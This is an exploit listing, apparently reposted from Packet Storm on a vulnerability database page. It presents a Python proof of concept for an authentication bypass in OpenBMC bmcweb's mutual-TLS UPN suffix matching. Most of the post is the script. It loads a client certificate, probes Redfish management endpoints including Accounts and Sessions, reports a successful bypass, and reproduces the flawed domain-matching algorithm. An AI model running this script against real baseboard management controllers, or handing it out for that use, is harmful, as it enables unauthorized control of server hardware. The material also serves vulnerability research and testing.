Lucene search
K

πŸ“„ OpenBMC bmcweb Authentication Bypass

πŸ—“οΈΒ 08 Jul 2026Β 00:00:00Reported byΒ indoushkaTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstorm.newsπŸ‘Β 16Β Views

Python PoC demonstrates OpenBMC bmcweb mutual authentication UPN suffix bypass via parent domain certificate.

Code
==================================================================================================================================
    | # Title     : OpenBMC bmcweb AUTH-F6 mTLS UPN Suffix Authentication bypass via parent-domain certificate                       |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://github.com/openbmc                                                                                       |
    ==================================================================================================================================
    
    [+] Summary    : a Python PoC-style security test script for OpenBMC mTLS authentication issue labeled β€œAUTH-F6 UPN suffix bypass”.
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import argparse
    import ssl
    import sys
    import requests
    import urllib3
    from urllib.parse import urljoin
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    class BMCWebAuthBypass:
        def __init__(self, target, port=443, use_ssl=True, verbose=False):
            self.target = target
            self.port = port
            self.use_ssl = use_ssl
            self.verbose = verbose
            self.base_url = f"{'https' if use_ssl else 'http'}://{target}:{port}"
            self.session = requests.Session()
            self.session.verify = False
            
        def log(self, msg, level="INFO"):
            colors = {
                "SUCCESS": "\033[92m[+]\033[0m",
                "ERROR": "\033[91m[-]\033[0m",
                "WARNING": "\033[93m[!]\033[0m",
                "INFO": "\033[96m[*]\033[0m"
            }
            print(f"{colors.get(level, '[*]')} {msg}")
        
        def setup_mtls(self, cert_file, key_file):
            """Setup mTLS with client certificate"""
            try:
                self.session.cert = (cert_file, key_file)
                self.log(f"Loaded client certificate from {cert_file}", "SUCCESS")
                return True
            except Exception as e:
                self.log(f"Failed to load certificate: {e}", "ERROR")
                return False
        
        def test_authentication(self):
            """Test if authentication succeeds with the certificate"""
            endpoints = [
                '/redfish/v1/Systems',
                '/redfish/v1/Managers',
                '/redfish/v1/SessionService/Sessions',
                '/redfish/v1/Chassis',
                '/redfish/v1/AccountService/Accounts'
            ]
            
            for endpoint in endpoints:
                url = urljoin(self.base_url, endpoint)
                self.log(f"Testing access to {url}")
                
                try:
                    response = self.session.get(url, timeout=10)
                    
                    if response.status_code == 200:
                        self.log(f"SUCCESS! Access granted to {endpoint}", "SUCCESS")
    
                        try:
                            data = response.json()
                            self.log(f"Response data: {list(data.keys()) if data else 'empty'}")
                        except:
                            pass
                        
                        return True
                    elif response.status_code == 401:
                        self.log(f"Access denied to {endpoint} (HTTP 401)")
                    else:
                        self.log(f"Response: HTTP {response.status_code}")
                        
                except Exception as e:
                    self.log(f"Error: {e}", "WARNING")
            
            return False
        
        def check_upn_matching(self, upn_email, target_domain=None):
            """Check if UPN matches target domain (vulnerable algorithm)"""
            
            if not target_domain:
                target_domain = self.target
            if '@' not in upn_email:
                self.log(f"Invalid UPN format: {upn_email}", "ERROR")
                return False
            
            user_part, upn_domain = upn_email.split('@')
            upn_labels = upn_domain.split('.')
            target_labels = target_domain.split('.')
            
            self.log(f"UPN domain: {upn_domain}")
            self.log(f"Target domain: {target_domain}")
            upn_idx = len(upn_labels) - 1
            target_idx = len(target_labels) - 1
            
            matching = True
            while upn_idx >= 0 and target_idx >= 0:
                if upn_labels[upn_idx] != target_labels[target_idx]:
                    matching = False
                    break
                upn_idx -= 1
                target_idx -= 1
            result = matching or upn_idx < 0
            
            self.log(f"Vulnerable algorithm result: {result}")
            
            if result:
                self.log("Certificate would authenticate for this domain (VULNERABLE)", "WARNING")
            else:
                self.log("Certificate would NOT authenticate (safe)")
            
            return result
        
        def run(self, cert_file=None, key_file=None, upn_email=None):
            """Main exploit routine"""
            
            self.log(f"Target: {self.base_url}")
            
            if cert_file and key_file:
                if not self.setup_mtls(cert_file, key_file):
                    return False
                if self.test_authentication():
                    self.log("Authentication bypass successful!", "SUCCESS")
                    return True
                else:
                    self.log("Authentication failed", "ERROR")
            
            elif upn_email:
                self.check_upn_matching(upn_email)
                return True
            
            else:
                self.log("No certificate or UPN provided", "ERROR")
            
            return False
    
    
    def main():
        parser = argparse.ArgumentParser(
            description="CVE-2026-XXXXX - bmcweb OpenBMC AUTH-F6 mTLS Bypass"
        )
        parser.add_argument("-t", "--target", required=True, help="Target BMC hostname")
        parser.add_argument("-p", "--port", type=int, default=443, help="Port (default: 443)")
        parser.add_argument("--cert", help="Client certificate file (PEM)")
        parser.add_argument("--key", help="Client key file (PEM)")
        parser.add_argument("--upn", help="UPN email to test (e.g., user@com)")
        parser.add_argument("--target-domain", help="Target domain for UPN test")
        parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
        
        args = parser.parse_args()
        
        print("""
    ╔══════════════════════════════════════════════════════════════════╗
    β•‘  CVE-2026-XXXXX - bmcweb OpenBMC AUTH-F6 mTLS UPN Bypass       β•‘
    β•‘  Authentication Bypass via Parent-Domain Certificate            β•‘
    β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
        """)
        
        exploit = BMCWebAuthBypass(
            target=args.target,
            port=args.port,
            verbose=args.verbose
        )
        
        success = exploit.run(
            cert_file=args.cert,
            key_file=args.key,
            upn_email=args.upn
        )
        
        sys.exit(0 if success else 1)
    
    
    if __name__ == "__main__":
        main()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation withΒ Vulners data

WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data

Api

Power your application withΒ Vulners API

The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access

App

Assess and manage vulnerabilities withΒ VulnersΒ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation